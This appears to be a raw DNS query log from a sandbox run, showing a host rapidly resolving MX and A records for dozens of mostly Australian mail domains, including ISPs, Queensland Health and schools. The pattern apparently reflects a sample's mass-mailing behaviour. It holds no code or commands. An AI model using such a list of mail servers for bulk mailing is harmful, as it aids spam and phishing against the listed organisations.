                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.210231066 CET8.8.8.8192.168.2.30x43cdNo error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.210231066 CET8.8.8.8192.168.2.30x43cdNo error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.210231066 CET8.8.8.8192.168.2.30x43cdNo error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.210231066 CET8.8.8.8192.168.2.30x43cdNo error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.210231066 CET8.8.8.8192.168.2.30x43cdNo error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.223072052 CET8.8.8.8192.168.2.30xed21No error (0)uow.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.223072052 CET8.8.8.8192.168.2.30xed21No error (0)uow.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.242389917 CET8.8.8.8192.168.2.30x8b1No error (0)au-smtp-inbound-2.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.242389917 CET8.8.8.8192.168.2.30x8b1No error (0)au-smtp-inbound-2.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.242389917 CET8.8.8.8192.168.2.30x8b1No error (0)au-smtp-inbound-2.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.242389917 CET8.8.8.8192.168.2.30x8b1No error (0)au-smtp-inbound-2.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.283019066 CET8.8.8.8192.168.2.30x1d88No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.283019066 CET8.8.8.8192.168.2.30x1d88No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.283019066 CET8.8.8.8192.168.2.30x1d88No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.307321072 CET8.8.8.8192.168.2.30x777aNo error (0)mta5.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.307321072 CET8.8.8.8192.168.2.30x777aNo error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.307321072 CET8.8.8.8192.168.2.30x777aNo error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.307321072 CET8.8.8.8192.168.2.30x777aNo error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.307321072 CET8.8.8.8192.168.2.30x777aNo error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.307321072 CET8.8.8.8192.168.2.30x777aNo error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.307321072 CET8.8.8.8192.168.2.30x777aNo error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.307321072 CET8.8.8.8192.168.2.30x777aNo error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.374692917 CET8.8.8.8192.168.2.30x59b2No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.374692917 CET8.8.8.8192.168.2.30x59b2No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.394680023 CET8.8.8.8192.168.2.30x86e4No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.404684067 CET8.8.8.8192.168.2.30xf5adNo error (0)health.qld.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.404684067 CET8.8.8.8192.168.2.30xf5adNo error (0)health.qld.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.404684067 CET8.8.8.8192.168.2.30xf5adNo error (0)health.qld.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.404684067 CET8.8.8.8192.168.2.30xf5adNo error (0)health.qld.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.404684067 CET8.8.8.8192.168.2.30xf5adNo error (0)health.qld.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.404684067 CET8.8.8.8192.168.2.30xf5adNo error (0)health.qld.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.485549927 CET8.8.8.8192.168.2.30x2d96No error (0)ozemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.553179026 CET8.8.8.8192.168.2.30xb512No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.574047089 CET8.8.8.8192.168.2.30x8db0No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.611829996 CET8.8.8.8192.168.2.30xdbb2No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.636213064 CET8.8.8.8192.168.2.30x8812No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.674196959 CET8.8.8.8192.168.2.30x956aNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.693177938 CET8.8.8.8192.168.2.30xc28fNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.735079050 CET8.8.8.8192.168.2.30x1e13No error (0)smtp6.health.qld.gov.au165.86.71.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.847253084 CET8.8.8.8192.168.2.30x9139No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.847253084 CET8.8.8.8192.168.2.30x9139No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.847253084 CET8.8.8.8192.168.2.30x9139No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.867542982 CET8.8.8.8192.168.2.30x27bNo error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.867542982 CET8.8.8.8192.168.2.30x27bNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.867542982 CET8.8.8.8192.168.2.30x27bNo error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.867542982 CET8.8.8.8192.168.2.30x27bNo error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.867542982 CET8.8.8.8192.168.2.30x27bNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.867542982 CET8.8.8.8192.168.2.30x27bNo error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.867542982 CET8.8.8.8192.168.2.30x27bNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.867542982 CET8.8.8.8192.168.2.30x27bNo error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.920511961 CET8.8.8.8192.168.2.30xaa95No error (0)aapt.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.957863092 CET8.8.8.8192.168.2.30x2e88No error (0)eq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.981028080 CET8.8.8.8192.168.2.30x30aNo error (0)eq-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:36.981028080 CET8.8.8.8192.168.2.30x30aNo error (0)eq-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.083054066 CET8.8.8.8192.168.2.30x2b79No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.104338884 CET8.8.8.8192.168.2.30x70bcNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.104931116 CET8.8.8.8192.168.2.30x253dNo error (0)saracen.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.134205103 CET8.8.8.8192.168.2.30x5ee6No error (0)saracen-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.134205103 CET8.8.8.8192.168.2.30x5ee6No error (0)saracen-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.139697075 CET8.8.8.8192.168.2.30x480dNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.139697075 CET8.8.8.8192.168.2.30x480dNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.139697075 CET8.8.8.8192.168.2.30x480dNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.157885075 CET8.8.8.8192.168.2.30x93f7No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.157885075 CET8.8.8.8192.168.2.30x93f7No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.157885075 CET8.8.8.8192.168.2.30x93f7No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.157885075 CET8.8.8.8192.168.2.30x93f7No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.157885075 CET8.8.8.8192.168.2.30x93f7No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.157885075 CET8.8.8.8192.168.2.30x93f7No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.157885075 CET8.8.8.8192.168.2.30x93f7No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.157885075 CET8.8.8.8192.168.2.30x93f7No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.219619989 CET8.8.8.8192.168.2.30x3b7bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.219619989 CET8.8.8.8192.168.2.30x3b7bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.219619989 CET8.8.8.8192.168.2.30x3b7bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.240345001 CET8.8.8.8192.168.2.30xccbdNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.240345001 CET8.8.8.8192.168.2.30xccbdNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.240345001 CET8.8.8.8192.168.2.30xccbdNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.240345001 CET8.8.8.8192.168.2.30xccbdNo error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.240345001 CET8.8.8.8192.168.2.30xccbdNo error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.240345001 CET8.8.8.8192.168.2.30xccbdNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.240345001 CET8.8.8.8192.168.2.30xccbdNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.240345001 CET8.8.8.8192.168.2.30xccbdNo error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.299144030 CET8.8.8.8192.168.2.30xb711No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.317547083 CET8.8.8.8192.168.2.30x6f73No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.376523972 CET8.8.8.8192.168.2.30xfb0dName error (3)brigidine.nsw.edu.au493394047487887nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.512109041 CET8.8.8.8192.168.2.30x94e3No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.603802919 CET8.8.8.8192.168.2.30x5cacNo error (0)mbc.qld.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.640583038 CET8.8.8.8192.168.2.30x1a85No error (0)adam.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.648467064 CET8.8.8.8192.168.2.30x2bbNo error (0)mbc-qld-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.648467064 CET8.8.8.8192.168.2.30x2bbNo error (0)mbc-qld-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.664910078 CET8.8.8.8192.168.2.30x317eNo error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.704948902 CET8.8.8.8192.168.2.30xdf80No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.704948902 CET8.8.8.8192.168.2.30xdf80No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.704948902 CET8.8.8.8192.168.2.30xdf80No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.734193087 CET8.8.8.8192.168.2.30x407No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.734193087 CET8.8.8.8192.168.2.30x407No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.734193087 CET8.8.8.8192.168.2.30x407No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.734193087 CET8.8.8.8192.168.2.30x407No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.734193087 CET8.8.8.8192.168.2.30x407No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.734193087 CET8.8.8.8192.168.2.30x407No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.734193087 CET8.8.8.8192.168.2.30x407No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.734193087 CET8.8.8.8192.168.2.30x407No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.782620907 CET8.8.8.8192.168.2.30x5227No error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.782650948 CET8.8.8.8192.168.2.30x1db4No error (0)riverside.qld.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.801876068 CET8.8.8.8192.168.2.30x2cb0No error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.801876068 CET8.8.8.8192.168.2.30x2cb0No error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.813757896 CET8.8.8.8192.168.2.30x7dceNo error (0)riverside-qld-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.813757896 CET8.8.8.8192.168.2.30x7dceNo error (0)riverside-qld-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.883913040 CET8.8.8.8192.168.2.30x6202No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.883913040 CET8.8.8.8192.168.2.30x6202No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.883913040 CET8.8.8.8192.168.2.30x6202No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.901848078 CET8.8.8.8192.168.2.30x4257No error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.901848078 CET8.8.8.8192.168.2.30x4257No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.901848078 CET8.8.8.8192.168.2.30x4257No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.901848078 CET8.8.8.8192.168.2.30x4257No error (0)mta5.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.901848078 CET8.8.8.8192.168.2.30x4257No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.901848078 CET8.8.8.8192.168.2.30x4257No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.901848078 CET8.8.8.8192.168.2.30x4257No error (0)mta5.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.901848078 CET8.8.8.8192.168.2.30x4257No error (0)mta5.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.990822077 CET8.8.8.8192.168.2.30xf5c9No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.990822077 CET8.8.8.8192.168.2.30xf5c9No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:37.990822077 CET8.8.8.8192.168.2.30xf5c9No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.008806944 CET8.8.8.8192.168.2.30x8e1eNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.008806944 CET8.8.8.8192.168.2.30x8e1eNo error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.008806944 CET8.8.8.8192.168.2.30x8e1eNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.008806944 CET8.8.8.8192.168.2.30x8e1eNo error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.008806944 CET8.8.8.8192.168.2.30x8e1eNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.008806944 CET8.8.8.8192.168.2.30x8e1eNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.008806944 CET8.8.8.8192.168.2.30x8e1eNo error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.008806944 CET8.8.8.8192.168.2.30x8e1eNo error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.094067097 CET8.8.8.8192.168.2.30x994dNo error (0)aapt.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.114428997 CET8.8.8.8192.168.2.30x9de2No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.293720007 CET8.8.8.8192.168.2.30x4d39Name error (3)mail.donvale.vic.edu.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.362956047 CET8.8.8.8192.168.2.30x274No error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.384632111 CET8.8.8.8192.168.2.30x13daNo error (0)starbank.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.515490055 CET8.8.8.8192.168.2.30xba78No error (0)mx.starbank.com.au.cust.a.hostedemail.com216.40.42.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.586791992 CET8.8.8.8192.168.2.30x4a93No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.586791992 CET8.8.8.8192.168.2.30x4a93No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.586791992 CET8.8.8.8192.168.2.30x4a93No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.608083963 CET8.8.8.8192.168.2.30x35ccNo error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.608083963 CET8.8.8.8192.168.2.30x35ccNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.608083963 CET8.8.8.8192.168.2.30x35ccNo error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.608083963 CET8.8.8.8192.168.2.30x35ccNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.608083963 CET8.8.8.8192.168.2.30x35ccNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.608083963 CET8.8.8.8192.168.2.30x35ccNo error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.608083963 CET8.8.8.8192.168.2.30x35ccNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.608083963 CET8.8.8.8192.168.2.30x35ccNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.642795086 CET8.8.8.8192.168.2.30xfcb4Name error (3)evandavis.id.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.675390959 CET8.8.8.8192.168.2.30xd5d2No error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.675390959 CET8.8.8.8192.168.2.30xd5d2No error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.745381117 CET8.8.8.8192.168.2.30x7a37No error (0)aanet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.745381117 CET8.8.8.8192.168.2.30x7a37No error (0)aanet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.745381117 CET8.8.8.8192.168.2.30x7a37No error (0)aanet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.759816885 CET8.8.8.8192.168.2.30x1713No error (0)plandevel.auth.grMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.759816885 CET8.8.8.8192.168.2.30x1713No error (0)plandevel.auth.grMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.766602993 CET8.8.8.8192.168.2.30xc22eNo error (0)mx1.eftel.com203.134.71.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.766602993 CET8.8.8.8192.168.2.30xc22eNo error (0)mx1.eftel.com203.134.153.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.778548002 CET8.8.8.8192.168.2.30xb821No error (0)mailsrv1.ccf.auth.gr155.207.1.1A (IP address)IN (0x0001)false
